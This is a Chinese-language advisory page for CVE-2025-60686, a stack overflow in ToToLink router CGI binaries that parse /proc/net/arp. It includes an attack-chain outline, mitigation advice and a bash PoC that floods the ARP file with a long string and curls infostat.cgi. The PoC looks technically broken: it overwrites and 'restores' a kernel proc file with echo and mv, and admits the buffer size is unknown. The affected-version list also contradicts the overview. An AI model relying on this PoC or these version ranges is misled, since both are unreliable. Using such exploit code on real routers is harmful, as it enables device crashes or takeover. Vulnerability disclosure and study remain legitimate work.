CVE-2025-60686 ToToLink路由器infostat.cgi和cstecgi.cgi本地栈缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-60686

漏洞类型

栈缓冲区溢出

CVSS评分

5.1 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ToToLink A720R、ToToLink LR1200GB、ToToLink NR1800X路由器

漏洞概述

CVE-2025-60686是ToToLink路由器中的本地栈缓冲区溢出漏洞。该漏洞影响A720R（V4.1.5cu.614_B20230630）、LR1200GB（V9.1.0u.6619_B20230130）和NR1800X（V9.1.0u.6681_B20230703）三个型号。漏洞存在于路由器的infostat.cgi和cstecgi.cgi二进制程序中，这两个程序在解析/proc/net/arp文件内容时，使用sscanf()函数配合"%s"格式说明符将数据写入固定大小的栈缓冲区，但未进行长度验证。攻击者可以通过控制/proc/net/arp文件的内容来触发内存损坏，从而可能导致拒绝服务或潜在的任意代码执行。由于攻击向量为本地且无需认证和用户交互，攻击复杂度较低，具有一定的实际威胁性。

技术细节

该漏洞的根本原因在于infostat.cgi和cstecgi.cgi程序在解析ARP表时使用了不安全的sscanf()函数调用。具体问题包括：1）程序使用"%s"格式说明符读取/proc/net/arp中的数据；2）数据被直接写入固定大小的栈缓冲区而没有长度检查；3）一个函数将用户控制的数据写入单字节缓冲区，另一个函数将数据写入相邻的小数组且均无边界检查。由于/proc/net/arp文件可以被本地攻击者修改，攻击者可以在ARP表中注入超长字符串，当CGI程序解析该文件时，超长的数据会溢出栈缓冲区，覆写相邻的栈内存，包括返回地址和函数指针等关键数据。成功利用此漏洞可导致程序崩溃（DoS）或通过覆盖返回地址实现任意代码执行。

攻击链分析

STEP 1

步骤1

攻击者获得ToToLink路由器的本地访问权限

STEP 2

步骤2

攻击者修改/proc/net/arp文件，在ARP表中注入超长字符串

STEP 3

步骤3

infostat.cgi或cstecgi.cgi程序被调用或周期性执行时，使用sscanf()解析/proc/net/arp

STEP 4

步骤4

sscanf()将超长数据写入固定大小的栈缓冲区，导致栈溢出

STEP 5

步骤5

溢出数据覆写栈上的返回地址、函数指针或关键变量

STEP 6

步骤6

函数返回时跳转到攻击者控制的地址，执行任意代码或导致程序崩溃

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-60686 PoC - ToToLink Router Local Stack Buffer Overflow
# This PoC demonstrates writing a long string to /proc/net/arp to trigger buffer overflow

# Generate a long string to overflow the stack buffer
# The buffer size is unknown but we generate a long string to trigger overflow
LONG_STRING=$(python3 -c "print('A' * 1024)")

# Backup original /proc/net/arp
cp /proc/net/arp /tmp/arp_backup

# Create malicious ARP entry with oversized data
echo "192.168.1.100      0x1      0x2           "$LONG_STRING"     *     eth0" > /proc/net/arp

# Trigger the vulnerable CGI script
echo "Triggering infostat.cgi..."
curl -s http://192.168.1.1/cgi-bin/infostat.cgi 2>/dev/null || echo "Service may be down"

# Restore original ARP table
mv /tmp/arp_backup /proc/net/arp

echo "PoC execution completed"

影响范围

ToToLink A720R < V4.1.5cu.614_B20230630

ToToLink LR1200GB < V9.1.0u.6619_B20230130

ToToLink NR1800X < V9.1.0u.6681_B20230703

防御指南

临时缓解措施

由于该漏洞需要本地访问路由器，建议用户：1）限制路由器的管理界面访问，仅允许受信任的IP访问；2）使用强密码保护路由器管理界面；3）关闭路由器的远程管理功能；4）监控/proc/net/arp文件的变更；5）考虑使用防火墙规则限制对CGI接口的访问；6）等待厂商发布官方补丁后及时升级固件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60686
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60686
3 Details https://www.cvedetails.com/cve/CVE-2025-60686/
4 VulDB https://vuldb.com/cve/CVE-2025-60686
5 Link http://totolink.com
6 Link https://github.com/yifan20020708/SGTaint-0-day/blob/main/ToToLink/ToToLink-A720R/CVE-2025-60686.md
7 Link https://www.totolink.net/